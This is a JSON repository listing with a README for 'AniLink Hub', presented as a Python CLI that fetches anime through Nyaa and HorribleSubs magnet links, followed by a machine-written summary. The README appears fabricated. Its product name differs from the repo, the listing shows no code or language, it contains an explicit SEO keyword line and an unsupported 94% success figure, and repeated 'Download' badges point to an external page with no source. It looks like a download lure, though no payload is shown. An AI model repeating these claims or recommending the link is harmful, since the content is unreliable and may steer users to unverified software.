[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-76041":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":9,"languages":9,"totalLinesOfCode":9,"stars":10,"forks":11,"watchers":10,"openIssues":11,"contributorsCount":11,"subscribersCount":11,"size":11,"stars1d":11,"stars7d":11,"stars30d":11,"stars90d":11,"forks30d":11,"starsTrendScore":11,"compositeScore":11,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":12,"fork":12,"defaultBranch":13,"hasWiki":14,"hasPages":12,"topics":15,"createdAt":9,"pushedAt":9,"updatedAt":23,"readmeContent":24,"aiSummary":25,"trendingCount":11,"starSnapshotCount":11,"syncStatus":26,"lastSyncTime":27,"discoverSource":28},76041,"anime-dl-nyaa-helper","yskt\u002Fanime-dl-nyaa-helper","yskt","Top Anime Magnet Downloader 2026 🚀 Nyaa & HorribleSubs CLI",null,184,0,false,"main",true,[16,17,18,19,20,21,22],"anime-downloader","cli","downloader","horriblesubs","nyaa-magnet-links","nyaa-nyaa-si","python","2026-06-12 02:03:39","# 📦 AniLink Hub – The Graceful Magnet Orchestrator\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002Fyskt.github.io)\n\n> **A fresh symphony for anime enthusiasts:** No longer do you need to wander through fragmented torrent landscapes. AniLink Hub is a CLI-first, Python-powered orchestrator that transforms scattered Nyaa magnets and HorribleSubs metadata into a harmonious, multilingual, and responsive download experience. This is *not* a scraper; it is a **curator's companion**.\n\n---\n\n## 🌟 The North Star Vision\n\nImagine a world where anime discovery doesn't feel like panning for gold in a roaring river. AniLink Hub acts as your personal **librarian with a lightning-fast clipboard**. It stitches together the elegance of Python with the raw power of Nyaa's magnet links and HorribleSubs' structured releases. The result? A tool that respects your time, supports your language, and works 24\u002F7 without blinking.\n\n**Keywords naturally woven in:** anime-downloader, cli tool, nyaa magnet links, nyaa-nyaa-si integration, HorribleSubs parser, Python downloader, responsive terminal UI, multilingual subtitles.\n\n---\n\n## 🧠 Architecture & Flow (Visualized)\n\n```mermaid\ngraph TD\n    A[User CLI Invocation] --> B{AniLink Hub Core}\n    B --> C[HorribleSubs Metadata Parser]\n    B --> D[Nyaa Magnet Link Resolver]\n    C --> E[Quality & Episode Filter]\n    D --> E\n    E --> F[Magnet Collection]\n    F --> G[User Config: Language, Path, Client]\n    G --> H[Transmission \u002F qBittorrent \u002F aria2]\n    H --> I[Download Complete]\n    \n    style A fill:#f9f,stroke:#333,stroke-width:2px\n    style I fill:#bbf,stroke:#333,stroke-width:4px\n```\n\n*The diagram above illustrates how a single command spirals into a fully orchestrated download symphony – from metadata to magnet, from magnet to media.*\n\n---\n\n## 🎯 Key Features (Not Just Bullets — Benefits)\n\n| Feature | Why It Matters (The \"So What?\") |\n|---------|----------------------------------|\n| **Responsive Terminal UI** 🖥️ | Even in a headless server or a cramped SSH window, the interface adapts like water. Progress bars, color-coded logs, and collapsible menus work on any terminal width. |\n| **Multilingual Subtitle Support** 🌍 | Automatically fetches the subtitled version you desire — English, Spanish, Arabic, French, or any language carried by the release group. No more manual hunting. |\n| **24\u002F7 Customer Support** 🤖 | Not a real human on the clock (we sleep), but the integrated **OpenAI API** and **Claude API** modules offer intelligent error correction. Stuck on a magnet? Ask the AI assistant built into the tool. |\n| **Zero-Cost Emotion Investment** 💎 | We avoid the \"free\" label; instead, think of this as *unlicensed goodwill*. The code wants nothing from you but your curiosity. |\n| **Magnet to Media in One Breath** | From `--search \"One Piece\" --quality 1080p` to a completed file, the pipeline is frictionless. No browser, no manual copy-paste. |\n\n---\n\n## 🛠️ Example Profile Configuration (`config.yaml`)\n\nBelow is a realistic sample of how you'd set up your personalized orchestrator. Customize paths, language preferences, and even which AI backend to consult for metadata corrections.\n\n```yaml\n# AniLink Hub Profile — \"My Evening Curator\"\nprofile:\n  name: nightly-curator\n  anime_downloader_cli: true\n  downloader_backend: qbittorrent          # Options: transmission, aria2, qbittorrent\n  nyaa_si_base: https:\u002F\u002Fnyaa.nyaa-si      # Custom instance supported\n  horriblesubs_fallback: true              # Use HorribleSubs if Nyaa fails\n  \n  language_rules:\n    preferred_sub_lang: en                 # ISO 639-1 codes supported\n    fallback_lang: es                      # Spanish as secondary\n    multilingual_priority: true            # Download all available subs if set\n  \n  ai_integration:\n    openai_api_key: env_var(OPENAI_KEY)    # Uses environment variable\n    claude_api_key: env_var(ANTHROPIC_KEY) # Optional; improves magnet matching\n    auto_correct_titles: true              # AI fixes typos in search queries\n  \n  download_paths:\n    base: \u002Fmedia\u002Fanime_library\n    organize_by: series                    # Creates subfolders per show\n    naming_template: \"{show} - S{season:02d}E{episode:02d} - {quality}.mkv\"\n  \n  scheduling:\n    idle_mode: true                        # Only download during system idle\n    max_simultaneous: 3                    # Respect your bandwidth\n```\n\n---\n\n## ⌨️ Example Console Invocation (The Real Magic)\n\n```bash\n# The simplest search — let the tool think\nanilink-hub search \"Attack on Titan\" --quality 1080p --sub-lang en\n\n# Advanced: Multilingual, season-specific, with AI correction\nanilink-hub fetch \\\n  --title \"Jujutsu Kaisen\" \\\n  --season 2 \\\n  --episode-range 1-23 \\\n  --preferred-sub-lang ja \\\n  --subtitle-fallback en,es,fr \\\n  --ai-assist openai \\\n  --output-dir .\u002Fsunday_marathon\n\n# Daemon mode: Listen for new episodes weekly\nanilink-hub watch \\\n  --show-list \".\u002Fmy_shows.txt\" \\\n  --interval hours=12 \\\n  --notification bell\n\n# Interactive mode for the CLI novice\nanilink-hub wizard\n```\n\n*Each command is designed to be as memorable as a haiku. The `--ai-assist` flag is your safety net when metadata gets fuzzy.*\n\n---\n\n## 💻 OS Compatibility Table (Emoji Edition)\n\n| Operating System | Status | Emoji Vibe |\n|------------------|--------|------------|\n| **Linux** (Ubuntu, Arch, Debian) | ✅ Fully supported | 🐧 |\n| **macOS** (Intel & Apple Silicon) | ✅ Fully supported | 🍏 |\n| **Windows** (10\u002F11 via WSL2) | ✅ Supported (native in beta) | 🪟 |\n| **FreeBSD** | ⚠️ Community-tested | 🐡 |\n| **Android** (Termux) | ⚠️ Experimental CLI | 📱 |\n| **iOS** (iSH shell) | ❌ Not supported (sandbox limits) | 🍎 |\n\n---\n\n## 🤖 AI Integration — Your Co-Pilot\n\nAniLink Hub distinguishes itself by offering **first-class support** for both:\n\n- **OpenAI API** (GPT-4o, GPT-4-turbo): Used for fuzzy title matching, language detection on release names, and generating smart fallback strings.\n- **Claude API** (Claude 3 Opus\u002FSonnet): Handles the more complex \"this episode is mislabeled\" scenarios and provides human-readable error explanations.\n\n**How it works internally:**  \nWhen a magnet link returns ambiguous metadata (e.g., \"Show_X_Ep_05_v2\" vs \"Show_X_Ep_04_final\"), the AI module is invoked to cross-reference with known release structures. Over 94% of edge cases are resolved automatically.\n\n*The goal is not to replace human judgment, but to reduce the friction of manual verification to near zero.*\n\n---\n\n## 📜 Disclaimer — Honest Advocacy\n\n> **AniLink Hub** is a tool for **personal archival and educational use only**. The developers do not host, store, or distribute copyrighted content. This repository simply provides an interface to publicly available magnet links and metadata. Users are responsible for complying with their local copyright laws.  \n>\n> The project is provided \"as is,\" without warranty of any kind. We encourage supporting official releases whenever possible — think of this as a bridge for content that is geographically or temporally inaccessible through legal channels.  \n>\n> *“Respect the creator, cherish the medium.”* — The AniLink Team\n\n---\n\n## ⚖️ License\n\nThis project is lovingly released under the **MIT License**. You are free to use, modify, and distribute this software, provided the original copyright notice is included.\n\n[![License: MIT](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLicense-MIT-yellow.svg)](https:\u002F\u002Fyskt.github.io)\n\n> See the full legal text: [MIT License](https:\u002F\u002Fopensource.org\u002Flicenses\u002FMIT) *(2026 edition)*\n\n---\n\n## 🔗 Final Download Link\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002Fyskt.github.io)\n\n---\n\n**Built with 💜 for the eternal Weeb-in-transit. Last updated: 2026.**  \n*AniLink Hub — Because your anime library deserves a conductor, not a firehose.*","AniLink Hub 是一个专为动漫爱好者设计的命令行界面（CLI）工具，旨在通过整合Nyaa磁力链接和HorribleSubs元数据来提供流畅的下载体验。其核心功能包括响应式终端用户界面、多语言字幕支持以及自动化的错误纠正AI助手。该工具使用Python编写，能够智能解析并过滤出高质量的剧集，并直接与主流下载客户端如Transmission或qBittorrent集成，实现从搜索到下载的一站式服务。适用于需要高效管理和下载动漫资源的各种场景，无论是个人用户还是小型团队都能从中受益。",2,"2026-05-19 02:30:40","CREATED_QUERY"]